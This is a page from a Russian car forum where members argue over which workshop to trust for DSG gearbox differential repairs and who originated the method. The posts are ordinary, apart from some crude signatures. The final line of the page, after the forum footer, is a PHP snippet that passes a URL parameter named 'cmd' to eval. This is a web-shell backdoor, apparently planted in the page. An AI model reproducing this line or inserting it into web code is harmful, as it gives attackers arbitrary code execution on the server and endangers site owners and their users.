+ Ответить в теме
Страница 1 из 6 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 60

Тема: Флуд на тему APEX GROUP


  1. #1
    I место Самые Интересные Диски 2011 White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice Аватар для White pony
    Регистрация
    18.05.2010
    Откуда
    Москва
    Машина
    Audi TT RS
    Сообщений
    1,900

    Флуд на тему APEX GROUP

    Молодцы, пацаны! Ради имиджа работать себе в убыток - это уважение! Я, помню, тоже повелась на скидку у некого дилера, которая больше, чем у Севера)))) В итоге заплатила за очистку радиатора, которую не выполнили, но в прайс включили. А потом проползла в север с пеплом на голове, чтоб переделывали и спасали)))

    Себе диф буду ставить у того, кому вы, пацаны, в панике звоните, когда с машиной что-то случается, с кем советуетесь, кто не одну машину перебрал своими руками)))) Любое вмешательство в коробку для меня - вопрос личного доверия. Я уже накалывалась на этом.
    На руси есть пословица о том, сколько раз платит любой, желающий сэкономить.

    ИМХО, без обид.
    Последний раз редактировалось inVENTOr; 26.05.2012 в 09:33.
    If you wanna be rich
    You've got to be a bitch
    If you wanna ride
    Ride the White pony

    Enjoy yourself and fuck them all 0:-)

  2. #2
    GTI-Racing vikeis is on a distinguished road Аватар для vikeis
    Регистрация
    24.11.2008
    Откуда
    Москва
    Машина
    Audi TTS REVO 2+
    Сообщений
    361
    а я вообще сервис выбираю по советам знакомых )
    вопрос денег не всегда в итоге главный, последствия иногда дороже обходятся =)
    как правильно заметила White pony)

    Тортуга сервис хороший был, но электронику они мне запороли %) зато выхлоп хороший сварили)

    рекламировать ничего не буду, но для каждой задачи должен быть свой сервис...
    а ГЛАВНОЕ от машины на подъемнике не отходить )
    Audi TT-S Kreuzfahrer / REVO stage2+ LT / BBS LM/LM-R / AirLift Accuair / Forge Twincooler, DV, Intake / насос APR / Magnaflow 3" custom

    http://www.drive2.ru/cars/audi/tt_s/tt_s/vikeis/

  3. #3
    GTI-Racing dimitryst will become famous soon enough Аватар для dimitryst
    Регистрация
    13.09.2011
    Откуда
    МСК
    Машина
    Разноцветное такси
    Сообщений
    1,052
    Цитата Сообщение от vikeis Посмотреть сообщение
    а ГЛАВНОЕ от машины на подъемнике не отходить )
    вот с этим точно соглашусь)

  4. #4
    I место Самые Интересные Диски 2011 White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice Аватар для White pony
    Регистрация
    18.05.2010
    Откуда
    Москва
    Машина
    Audi TT RS
    Сообщений
    1,900
    Сколько знакомых, столько и советов. Ориентироваться нужно не на сервис, а на мастера! Потому что именно ему ты доверяешь своё сокровище.
    Мой мастер за сверх прибылью не гонится и на нас бабло не наваривает. Не демпингует, не юлит и не играет. Человек руководствуется личным опытом, чутьём и профильным образованием. Мне по душе такой подход.
    If you wanna be rich
    You've got to be a bitch
    If you wanna ride
    Ride the White pony

    Enjoy yourself and fuck them all 0:-)

  5. #5
    GTI-Racing Proof has a spectacular aura about Proof has a spectacular aura about Proof has a spectacular aura about Аватар для Proof
    Регистрация
    09.08.2010
    Откуда
    Москва
    Машина
    VW Scirocco 2.0T
    Сообщений
    364
    Цитата Сообщение от KOT Посмотреть сообщение
    а на 5 гти дифф сколько будет стоить?
    если на ДСГ то цены выше...

    Добавлено через 38 минут
    Цитата Сообщение от dimitryst Посмотреть сообщение
    вот с этим точно соглашусь)
    это абсолютно не правильно, по желанию, клиент может быть в рем. зоне, но не должен стоять над душой у мастера....

    Добавлено через 53 минуты
    Цитата Сообщение от White pony Посмотреть сообщение
    Молодцы, пацаны! Ради имиджа работать себе в убыток - это уважение! Я, помню, тоже повелась на скидку у некого дилера, которая больше, чем у Севера)))) В итоге заплатила за очистку радиатора, которую не выполнили, но в прайс включили. А потом проползла в север с пеплом на голове, чтоб переделывали и спасали)))

    Себе диф буду ставить у того, кому вы, пацаны, в панике звоните, когда с машиной что-то случается, с кем советуетесь, кто не одну машину перебрал своими руками)))) Любое вмешательство в коробку для меня - вопрос личного доверия. Я уже накалывалась на этом.
    На руси есть пословица о том, сколько раз платит любой, желающий сэкономить.

    ИМХО, без обид.
    мне не понятен ваш сарказм, но видно такой ваш стиль общения.....

    я рад, что у вас есть место где вы можете отремонтировать свое авто, но к данной это не имеет никакого отношения....

    Мы никому не навязываемся и никого не заставляем, что либо делать у нас, мы предлагаем услуги, а воспользоваться ими или нет, дело ваше.

    Добавлено через 57 минут
    Цитата Сообщение от White pony Посмотреть сообщение
    Сколько знакомых, столько и советов. Ориентироваться нужно не на сервис, а на мастера! Потому что именно ему ты доверяешь своё сокровище.
    Мой мастер за сверх прибылью не гонится и на нас бабло не наваривает. Не демпингует, не юлит и не играет. Человек руководствуется личным опытом, чутьём и профильным образованием. Мне по душе такой подход.
    не ужели работает бесплатно?
    в иных случаях фраза "бабло не наваривает" не достоверна.
    Последний раз редактировалось Proof; 15.05.2012 в 03:57. Причина: Добавлено сообщение
    Я на Drive2.ru
    Scirocco 2.0T: APR stage 3, KW Clubsport, APracing Competition kit, Ferodo DS3000, BBS LM R18*9J + Fedelal FZ201 235*40*18, распорка Wiechers, drexler motorsport, Стабы H&R, Recaro Spg, APR intake,Canton Racing, Mocal Oil cooler kit

    АДМ — 1:51.740 (Новиков А.)
    Kazan Ring — 1:35.939 (Милицын Д.)
    Moscow Raceway — 1:56.389 (Милицын Д.)
    Смоленское кольцо — 1:44.761 (Милицын Д.)
    Н-ринг — 1:49.471 (Милицын Д.)


    APEX Racing

  6. #6
    GTI-Racing vikeis is on a distinguished road Аватар для vikeis
    Регистрация
    24.11.2008
    Откуда
    Москва
    Машина
    Audi TTS REVO 2+
    Сообщений
    361
    Стоять над душой, это лезть с вопросами и поправками. Я говорил не об этом, я говорю о элементарном не доверии) У нас все ОЧЕНЬ хитрые, а вдобавок еще и крайне криворуки-забывчивы.

    Я ни в коем разе не говорю про сервис APEX, ибо там не был, и составить мнение не могу )
    Audi TT-S Kreuzfahrer / REVO stage2+ LT / BBS LM/LM-R / AirLift Accuair / Forge Twincooler, DV, Intake / насос APR / Magnaflow 3" custom

    http://www.drive2.ru/cars/audi/tt_s/tt_s/vikeis/

  7. #7
    I место Самые Интересные Диски 2011 White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice Аватар для White pony
    Регистрация
    18.05.2010
    Откуда
    Москва
    Машина
    Audi TT RS
    Сообщений
    1,900
    Цитата Сообщение от Proof Посмотреть сообщение
    мне не понятен ваш сарказм, но видно такой ваш стиль общения.....

    я рад, что у вас есть место где вы можете отремонтировать свое авто, но к данной это не имеет никакого отношения....
    Мой стиль общения со всеми разный. С вами - сарказм, обусловленный Вашей азиатской находчивостью)) Мой друг космонавт инноватор! Некогда его супер кар, самый красивый МК5 ГТИ, отказался ехать. Дилеры ему наплели фигни про то, что у него сдохло сцепление и прочую ересь. Но Саня не поверил. И решил рискнуть. Несколько дней с папой он разбирал свою ДСГ, чтоб докапаться до истины, найти неисправный узел. Своими золотыми руками снял и прочистил коробку, обнаружил раздолбанный диф и заменил его! И машина поехала, да ещё как! Санины призовые места на кольце - лучшее подтверждение правильности его теории! И тогда к нему пошли люди, вдохновленные его опытом, получившие надежду избавиться от проблем с ДСГ. Дилер нервно закурил.

    Уверена, ты, Прув, один из вдохновленных) То, что сделал Саня, закон именует ноу-хау. То, что делаете вы, называется "ну он же это не запатентовал, хуле, рыночная экономика рулит".

    Мне совершенно наплевать, кто как ведёт свой бизнес и чем руководствуется при этом. Просто есть первоисточник - Саня, а есть подражатели - все остальные)))
    If you wanna be rich
    You've got to be a bitch
    If you wanna ride
    Ride the White pony

    Enjoy yourself and fuck them all 0:-)

  8. #8
    I место Самые Интересные Диски 2011 White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice Аватар для White pony
    Регистрация
    18.05.2010
    Откуда
    Москва
    Машина
    Audi TT RS
    Сообщений
    1,900
    Цитата Сообщение от Proof Посмотреть сообщение
    если совершил ошибку должен её признавать и исправлять за свой счет!
    Это фантастика. Никто и никогда в здравом уме не признает свою ошибку, и уж тем более из своей ЗП не будет ее исправлять. Сколько случаев было и у меня, и у одноклубней.
    А стоять за спиной своего сотрудника - очень эффективный способ стимулирования трудовой активности. Более совершенного пока не придумали.

    Добавлено через 6 минут
    Кстати, вспомнилась история. Когда я ещё работала в юр консалтинге, коллега нагло сперла у меня 90% текста консультации! А я даже не расстроилась)) Потому что Я таких консультаций ещё 10000 штук напишу, развивая свою идею согласно своей логики. А она в лужу сядет при первом же дополнительном вопросе, заданном по украденному у меня материалу. Вот и вся разница. Расшифровывая аллегорию, поясню: вы можете под ключ снять/установить дифф, а Саня как автор идеи делает значительно больше. На месте он не стоит, его наработки позволяют уже сейчас устранять ЛЮБУЮ неисправность ДСГ. ЛЮ-БУ-Ю! И у меня от сердца отлегло, не висит больше над нами домоклов меч, связанный со стоимостью замены коробки.
    Последний раз редактировалось White pony; 15.05.2012 в 12:22. Причина: Добавлено сообщение
    If you wanna be rich
    You've got to be a bitch
    If you wanna ride
    Ride the White pony

    Enjoy yourself and fuck them all 0:-)

  9. #9
    GTI-Racing dimitryst will become famous soon enough Аватар для dimitryst
    Регистрация
    13.09.2011
    Откуда
    МСК
    Машина
    Разноцветное такси
    Сообщений
    1,052
    Кать, ну справедливости ради, дифы в дсг устанавливали и раньше, в той же Тортуге, в Диджи-Теке, много где, но больше с целью тюнинга, чем для решения ненадежности этого узла. Так что никто ни у кого ничего не спирал.

    Другое дело, что Саня связал диф с глюками мехатрона - тут ему респект и уважуха. Да, по сути он популяризировал замену дифа как метод лечения дсг, но застолбить за собой монополию на эти работы вряд ли физически возможно. Но с другой стороны, если там помимо дифа еще какие-то проблемы, то я скорее обращусь к нему, чем к другим неизвестным мне лично мастерам...
    Последний раз редактировалось dimitryst; 15.05.2012 в 12:47.

  10. #10
    GTI-Racing est is on a distinguished road Аватар для est
    Регистрация
    18.07.2008
    Машина
    AUM
    Сообщений
    91
    Пони, а Космонавт какой идеи автор?

+ Ответить в теме
Страница 1 из 6 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. APEX GROUP (station, store, bar, motorsport, racing)
    от Proof в разделе Партнеры / Клубные скидки
    Ответов: 172
    Последнее сообщение: 02.04.2024, 06:14
  2. APEX.RU Кто быстрее?
    от IvanGTIV в разделе Украина
    Ответов: 24
    Последнее сообщение: 16.04.2010, 15:31
  3. Ответов: 63
    Последнее сообщение: 07.12.2007, 16:23
  4. флуд на тему гонок с селиками
    от 3BEPb в разделе Авто спорт
    Ответов: 715
    Последнее сообщение: 09.08.2007, 15:06

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}